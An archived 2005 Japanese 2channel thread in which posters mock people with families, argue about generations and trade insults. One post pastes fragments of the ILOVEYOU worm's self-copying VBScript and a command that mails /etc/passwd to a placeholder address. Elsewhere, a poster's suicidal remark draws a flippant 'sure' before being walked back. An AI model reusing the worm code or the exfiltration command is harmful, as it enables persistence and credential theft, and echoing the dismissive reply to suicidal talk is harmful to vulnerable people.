2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

家族持ちは本能に翻弄されたアホの集合体

1 :代表:2005/05/07(土) 13:47:11
さあ、アホどもを笑ってやりましょう!!!

2 :名無しさん@お腹いっぱい。:2005/05/07(土) 13:48:35
恋愛(さかり)に翻弄され地獄を味わっているアホどもを笑おうではないは、諸君!!!

3 :名無しさん@お腹いっぱい。:2005/05/07(土) 13:50:21
笑おうではないか!!!存分にな!!!

4 :名無しさん@お腹いっぱい。:2005/05/07(土) 20:35:55
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"




5 :名無しさん@お腹いっぱい。:2005/05/07(土) 22:31:16
アホ

6 :名無しさん@お腹いっぱい。:2005/05/07(土) 22:38:35
性欲に負けた負け犬どもを笑うのか、ええな・・・わらったろ、がははは!!!

7 :名無しさん@お腹いっぱい。:2005/05/07(土) 23:32:45
あげ

8 :名無しさん@お腹いっぱい。:2005/05/07(土) 23:43:23
糞スレだが・・・スレタイは家族持ちからしたら笑えない事実だなw

9 :名無しさん@お腹いっぱい。:2005/05/08(日) 12:58:51
保守

10 :名無しさん@お腹いっぱい。:2005/05/08(日) 13:01:19
家族持ちだろうがなんだろうが
大切なモノが違うだけで
皆本能を駆使して舞いを踊ってるのは同じだろが。

何をイキマイテるやら。

11 :名無しさん@お腹いっぱい。:2005/05/08(日) 14:35:39
いったい何を考えて子供をもうけようとするんだろうか。
この不条理溢れる世の中で子供をもうけても辛いことの繰り返しじゃないか。
人間に価値などないのだよ。いったいいつになったらきづくのかね。

子を設けるやつらの名目的な理由は人類の未来創造だろう。
実質は、性欲解消の産物とか老後の面倒をみてもらうってところだろう。

今の世の中の問題点は年寄り(中年以上)どもが若者を尊重しないという人間性の低さにあると思う。
若者を馬鹿にしなめ腐ってる。今の世の中を作ったのはまちがいなくじじいどもだ。
そのくせ最近の若い者はなどと責任転嫁・因縁をつけてくる始末だ。
もちろん馬鹿はいるが、馬鹿はどの世代にもいる。
自己中の年寄りが牛耳り若者は生き辛くなっている。
それは、国の政策(年金や国債等)だけでなく、企業や日常でも溢れている。
今の中年以上に問題がある。
これからも少子化がつづくだろう。少なくともわれわれ若者が年寄りになるまでは。

12 :11:2005/05/08(日) 14:39:37
しまった。ここは40代板だったのか。
他スレからリンクしてきたからきづかんかった。
ちなみに俺は20代前半だ。

13 :名無しさん@お腹いっぱい。:2005/05/08(日) 15:48:45
いいたい事はいえたかw
俺達が若かった時ほざいた事を同じ事を
やっぱり子供を作って育てた事の無い若造がほざいとる。

若者の机上の空論はいつまでたっても机上の空論だ。
何も分からんのに分かったような口を聞く、
それが若者というものだ。
俺達がそうだったようにな。


14 :11:2005/05/08(日) 16:06:22
>>13
俺は信念があるからお前らのように欲に流されはしない。
周りが変わっても俺は変わらない。
今までもこれからも。
ミスターストイックと呼ばせてやってもいいぞ。

15 :名無しさん@お腹いっぱい。:2005/05/08(日) 16:09:30
>>14
よう!まひるいまき!

16 :名無しさん@お腹いっぱい。:2005/05/08(日) 16:13:48
>>14
わははは、俺も似た様な事を言った覚えがあるさ。
信念があるから流されないというのは
進歩が無い、学ばない、知恵がつかないという意味にもなるから
せいぜい気をつけてな。

信念は体験があって持てるものだ。
まあ、おまえなりに頑張れや。

17 :名無しさん@お腹いっぱい。:2005/05/08(日) 16:28:46
14
こいつは地獄アホだ。
信念と強情なのを区別できないな。
こんな奴近くにいたら、即効つまはじきだな。まだいじめにでも逢ってるんだろうな。
信念と言うだけのノータリンを笑ってやれWWW

18 :11:2005/05/08(日) 17:58:45
ははは。さすがに40代だけあって毒男板とは違うな。
煽りながらもその内容は的をえている正論だよ。

しかし、生欲のない俺には生きるものの論理は響かない。


19 :名無しさん@お腹いっぱい。:2005/05/08(日) 18:30:44
家族持ちを思い切り笑い飛ばしてくれるわw

性欲に負けたうつけどもが
 ハハハ                             イキデキネーヨ
   ∧_∧  / ̄ ̄ ̄ ̄ ̄ ̄ ̄   ハライテ-       ゲラゲラ
   ( ´∀`) <  パンツ脱げたよ     ∧_∧       〃´⌒ヽ       モウ カンベン
.  ( つ ⊂ )  \_______   (´∀` ,,)、      ( _ ;)        シテクダサイ
   .)  ) )   ○   ∧_∧      ,, へ,, へ⊂),     _(∨ ∨ )_     ∧_∧ ○,
  (__)_)  ⊂ ´⌒つ´∀`)つ    (_(__)_丿      し ̄ ̄し     ⊂(´∀`⊂ ⌒ヽつ
          タッテ ラレネーヨ
           ワハハハ

20 :名無しさん@お腹いっぱい。:2005/05/08(日) 22:20:31
家族持ちは勘違いした変人が多いからね・・・気をつけないと。

21 :名無しさん@お腹いっぱい。:2005/05/09(月) 03:00:54
独身で子供を作らない事がお前の信念なら
それでいいだろう。
信念通りに生きられて幸せだろう。
此所で毒を吐く必要は無いはずだ。

自分の苦悩や寂しさを
こんな風に表現しているなら
もっと素直になれ。

自分の行動に責任を持て。

22 :名無しさん@お腹いっぱい。:2005/05/09(月) 05:14:53
>>1
あなたのDNAは誰にも受け継がれない。断種。オメ。w

23 :名無しさん@お腹いっぱい。:2005/05/09(月) 06:20:56
嫁はまったく可愛くないけど子供は可愛いんでしょ?

24 :名無しさん@お腹いっぱい。:2005/05/09(月) 06:41:08
>>23
ただの嫉妬コメントか。

25 :名無しさん@お腹いっぱい。:2005/05/09(月) 07:15:04
誰に嫉妬するの?既婚男性板でも結婚は後悔してるけど子供は可愛いってよく見るから、そうなのかと思ったんですけど…。

26 :名無しさん@お腹いっぱい。:2005/05/09(月) 07:19:46
>>25

そういう事を家族持ちを笑おうというスレに書けば
嫉妬と取れるよ。
どういう目的があって書いたの?

27 :名無しさん@お腹いっぱい。:2005/05/09(月) 07:21:51
そうそう、旦那に相手にしてもらってない妻の愚痴かと思った、、、

28 :名無しさん@お腹いっぱい。:2005/05/09(月) 07:26:54
いや、
俺は不倫相手が子供の為に離婚をしないのが我慢できん
不倫女かと思った。

29 :11:2005/05/09(月) 13:19:59
人は孤独。孤独でこそ人。

集団は人たる因を消滅させる。

我が強情であるならばそれはこれまでの人生の結果である。

すなわち我である。二度と信じはしない。

孤独であってこそ人権を最大限いかせるのだ。


30 :名無しさん@お腹いっぱい。:2005/05/09(月) 13:23:11
>>29

家族がおろうが子供がおろうが
独身であろうがナンであろうが

人は皆孤独、
死ぬも生きるも独りというのは基本の基本なんじゃドアホ。

31 :名無しさん@お腹いっぱい。:2005/05/09(月) 13:31:39
本能に翻弄されたアホか。。
オイラはいつでも本能に翻弄されてるな。

性欲よりまず食欲に翻弄されてる。
腹一杯飯を食いたい。美味い物を喰いたい。
でも働かなきゃソレも叶わない訳で。。とーさん

狩猟本能改め勤労本能なんてオイラは持たね。
イヤ。。チョトくらいはあるかな?
でもソレさえも本能とまでは言わないけど煩悩。。

動物なんて本能に翻弄される生き物だと思うけどなぁ〜>>1

32 :11:2005/05/09(月) 23:16:08
我は欲情を満たさないと生きられない煩悩まみれの節操の無い人間ではない。

煩悩を主義・主張というけだものは消滅すべきである。

33 :名無しさん@お腹いっぱい。:2005/05/10(火) 01:04:06
なんだか小難しい話になってきたな・・・(´・ω・`) ショボーン

34 :名無しさん@お腹いっぱい:2005/05/10(火) 02:18:03
11君、煩悩に囚われないということは、世事に達観していて、
他所のことが自然によかったですねと、受け入れられることであろう。
貴殿は、青春の希望と現実とが合致しないので、文句を言っているだけの
気がする。


35 :11:2005/05/10(火) 16:52:59
人は存在そのものが醜悪である。

生きる考え(欲)すべてが煩悩であるのだ。

滅びの路を選ぶべき生物であることに早く気付くべきなのである。

我は啓蒙のために死ぬことすら出来ない。

世の中で一番辛労辛苦の人間なのである。








もう死んでもいいか?

36 :7 LOTUS TC:2005/05/10(火) 19:45:38
いいよ

37 :7 LOTUS TC:2005/05/10(火) 19:47:34
・・・本当に氏んだら困るから 生きてろ

38 :11:2005/05/10(火) 21:29:56
首切り動画みてしまった。
たぶん今報道されてる人たちの。

やっぱ生きるか。
死ぬこと考えちゃだめだな。
40代なら役員か人事担当いるだろ?
死なないように俺を雇え。
悪徳企業はお断りだからな。

まあ、まだ貯金あるから本当に死に掛けた時でいいや。


39 :名無しさん@お腹いっぱい。:2005/05/12(木) 21:03:54
スレタイからはずれてるよ
かなり

40 :11:2005/05/12(木) 23:06:35
わかった。俺が責任を持ってこのスレの趣旨に戻すよ。

恥辱にまみれてるやりチン、やりマンの猿どもが堂々と
存在してんじゃねぇぞぼけが。
ちっとは恥ずかしいと思え。そういう態度をとれアホが。
欲に負けた愚人間どもは猿山へ(・∀・)カエレ!


41 :名無しさん@お腹いっぱい。:2005/05/12(木) 23:22:03
>>40

スレタイを、「ただの文句タレ厨房クラブ」にするとしっくりクルヨ。

42 :11:2005/05/13(金) 00:18:12
じゃあそうしろ

43 :名無しさん@お腹いっぱい。:2005/05/16(月) 11:31:25
なぁ11よ。。聞いてくれ。
やりチン・やりマンと言われる輩が何程の事があろうか?
仮に1000人の相手と交尾したとしてだ。。
生殖行為を行える異性の何パーセントだと言うのだ。
人口構成を詳しく知らないから推測値を計算してみよう。
およそ全世界の男女比率を1:1
生殖行為を行うに足る年齢層を30%と仮定。

60億×50%×30%=9億人
1000人÷9億=0.0000011111・・・・だ。

日本の人口を約1.2億人として同様に計算してみよう。
1000人÷(1.2億×50%×30%)=0.00055555・・・・だ。

俺はこの事実を知った時に愕然としたよ。
俺はせいぜい100人くらいの女としか関係を持ったことがない。
お前と俺は生殖行為に関して言えば大差ないんだ。

なぁ11よ。。共に生きて逝こうじゃないか。


44 :名無しさん@お腹いっぱい。:2005/05/18(水) 00:15:20
保守

11 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)